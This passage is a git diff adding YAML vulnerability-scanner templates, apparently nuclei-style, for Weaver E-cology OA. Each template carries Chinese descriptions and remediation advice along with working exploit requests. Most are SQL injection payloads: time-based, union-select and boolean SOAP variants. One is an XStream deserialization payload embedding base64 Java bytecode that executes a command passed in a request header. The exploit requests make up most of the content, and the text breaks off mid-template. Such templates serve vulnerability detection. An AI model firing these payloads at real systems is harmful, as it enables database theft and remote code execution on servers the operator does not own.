泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_2==200 + - (duration_2 - duration_1) >=5 + - type: dsl + condition: and + dsl: + - status_code_3==200&&status_code_4==200 + - (duration_4 - duration_3) >=5 + matchers-condition: or + path: + - '{{BaseURL}}/wui/theme/ecology7/page/login.jsp?templateId=1' + - '{{BaseURL}}/wui/theme/ecology7/page/login.jsp?templateId=1''%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20assys2,%20sysusers%20as%20sys3,%20sysusers%20AS%20sys4,%20sysusers%20AS%20sys5,%20sysusers%20AS%20sys6,sysusers%20AS%20sys7,%20sysusers%20AS%20sys8)=1%20and%20''1''=''1' + - '{{BaseURL}}/wui/theme/ecology7/page/login.jsp?templateId=1' + - '{{BaseURL}}/wui/theme/ecology7/page/login.jsp?templateId=1''%20AND%206120=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(119)||CHR(86),5)%20AND%20''bcBY''=''bcBY' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-rce-WorkflowServiceXml.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-rce-WorkflowServiceXml.yaml" new file mode 100755 index 000000000..1aabe3708 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-rce-WorkflowServiceXml.yaml" @@ -0,0 +1,46 @@ +id: Ecology-rce-WorkflowServiceXml +info: + name: 泛微 E-Cology WorkflowServiceXml远程代码执行漏洞 + author: + - 折跃 + description: |- + 泛微 E-Cology WorkflowServiceXml远程代码执行漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在代码执行漏洞,攻击者可利用该漏洞执行系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、验证请求内容,过滤恶意代码及各种绕过方式,如大小写、BASE64编码,限制提交。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + raw: + - | + POST /services%20/WorkflowServiceXml HTTP/1.1 + Host: {{Hostname}} + SOAPAction: "" + cmd: echo "{{verify}}" + Content-Type: text/xml;charset=UTF-8 + + + + + + <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBDCABECgBFAEYIADUHAEcKAAgASAcASQoASgBLBwBMCAAuCgAMAE0KAAwATgcATwsAEABQBwBRCgBSAFMHAFQKABQAPwgAVQoAFABWCgAUAFcKAFIAWAoAWQBaCgASAFsIAFwKABIAXQoAEgBeCgBfAGAHAGEKACAAYgcAYwcAZAEABGpha3kBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIkx5YW9zZXJpYWwvcGF5bG9hZHMvdXRpbC9UZXN0T2JqMTsBAAg8Y2xpbml0PgEAA2NtZAEAA3JlcAEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAANvdXQBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAGEBAApTb3VyY2VGaWxlAQANVGVzdE9iajEuamF2YQwAJgAnDAAkACUHAGUMAGYAZwwAaABpAQAsY29tLmNhdWNoby5zZXJ2ZXIuZGlzcGF0Y2guU2VydmxldEludm9jYXRpb24HAGoMAGsAbAEAD2phdmEvbGFuZy9DbGFzcwwAbQBuAQAQamF2YS9sYW5nL09iamVjdAcAbwwAcABxAQAtY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwU2VydmxldFJlcXVlc3RJbXBsDAByAHMMAHQAdQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAB2AHcBABFqYXZhL3V0aWwvU2Nhbm5lcgcAeAwAeQB6AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAdjbWQgL2MgDAB7AHwMAH0AfgwAfwCABwCBDACCAIMMACYAhAEAAlxBDACFAIYMAIcAfgcAiAwAiQCKAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiwAnAQAgeWFvc2VyaWFsL3BheWxvYWRzL3V0aWwvVGVzdE9iajEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEmdldFNlcnZsZXRSZXNwb25zZQEAISgpTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCMCgCNAD8AIQAiAI0AAQAjAAEACgAkACUAAAACAAEAJgAnAAEAKAAAAC8AAQABAAAABSq3AI6xAAAAAgApAAAABgABAAAABwAqAAAADAABAAAABQArACwAAAAIAC0AJwABACgAAAE5AAYABgAAAIMBswACuAADtgAEEgW2AAZLKhIHA70ACLYACUwrAQO9AAq2AAvAAAxNLBINtgAOxgBMLBINtgAOTiy2AA/AABA6BBkEuQARAQA6BRkFuwASWbgAE7sAFFm3ABUSFrYAFy22ABe2ABi2ABm2ABq3ABsSHLYAHbYAHrYAH6cACEsqtgAhsQABAAQAegB9ACAAAwApAAAAPgAPAAAACQAEAA0AEAAOABsADwAoABAAMQARADgAEgBBABMASgAUAHEAFQB3ABQAegAZAH0AFwB+ABgAggAaACoAAABIAAcAOABCAC4AJQADAEEAOQAvADAABABKADAAMQAyAAUAEABqADMANAAAABsAXwA1ADYAAQAoAFIANwA4AAIAfgAEADkAOgAAADsAAAAKAAP7AHpCBwA8BAABAD0AAAACAD4=</byte-array> <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> + 2 + + + + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-BlogService.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-BlogService.yaml" new file mode 100755 index 000000000..7c0c00229 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-BlogService.yaml" @@ -0,0 +1,79 @@ +id: Ecology-sqli-BlogService +info: + name: 泛微 E-cology BlogService注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology BlogService SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - body_1 == body_2 + - contains(body_3,'') + raw: + - | + POST /services/BlogService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Soapaction: "" + + + + + + + + + + - | + POST /services/BlogService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Soapaction: "" + + + + + + -1 OR 1=1 AND 1=2 + + + + - | + POST /services/BlogService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Soapaction: "" + + + + + + -1 OR 1=1 AND 1=1 + + + + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerEdit.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerEdit.yaml" new file mode 100755 index 000000000..11454afad --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerEdit.yaml" @@ -0,0 +1,38 @@ +id: Ecology-sqli-HrmCareerApplyPerEdit +info: + name: 泛微 E-cology HrmCareerApplyPerEdit.jsp 注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology HrmCareerApplyPerEdit.jsp SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerView.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerView.yaml" new file mode 100755 index 000000000..d0db506d2 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyPerView.yaml" @@ -0,0 +1,38 @@ +id: Ecology-sqli-HrmCareerApplyPerView +info: + name: 泛微 E-cology HrmCareerApplyPerView.jsp 联合查询注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology HrmCareerApplyPerView.jsp SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkEdit.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkEdit.yaml" new file mode 100755 index 000000000..e11adc79e --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkEdit.yaml" @@ -0,0 +1,38 @@ +id: Ecology-sqli-HrmCareerApplyWorkEdit +info: + name: 泛微 E-cology HrmCareerApplyWorkEdit.jsp 联合查询注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology HrmCareerApplyWorkEdit.jsp SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkView.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkView.yaml" new file mode 100755 index 000000000..379bdb5c6 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-HrmCareerApplyWorkView.yaml" @@ -0,0 +1,38 @@ +id: Ecology-sqli-HrmCareerApplyWorkView +info: + name: 泛微 E-cology HrmCareerApplyWorkView.jsp 联合查询注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology HrmCareerApplyWorkView.jsp SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + path: + - '{{BaseURL}}/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-MobileService.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-MobileService.yaml" new file mode 100755 index 000000000..3c4697459 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-MobileService.yaml" @@ -0,0 +1,80 @@ +id: Ecology-sqli-MobileService +info: + name: 泛微 E-cology MobileService注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology MobileService SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body_1,'ns1:out>4') + - contains(body_2,'ns1:out>4') + - contains(body_3,'ns1:out>5') + raw: + - | + POST /services/MobileService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Soapaction: "" + + + + + + + + + + - | + POST /services/MobileService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Soapaction: "" + + + + + + -1' OR 6=5 AND 1=1 or '1'=' + + + + - | + POST /services/MobileService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Soapaction: "" + + + + + + -1' OR 6=6 AND 1=1 or '1'=' + + + + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-SignatureDownLoad.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-SignatureDownLoad.yaml" new file mode 100755 index 000000000..156161c7b --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-sqli-SignatureDownLoad.yaml" @@ -0,0 +1,38 @@ +id: Ecology-sqli-SignatureDownLoad +info: + name: 泛微 E-cology weaver.file.SignatureDownLoad 参数markId联合查询注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology weaver.file.SignatureDownLoad SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 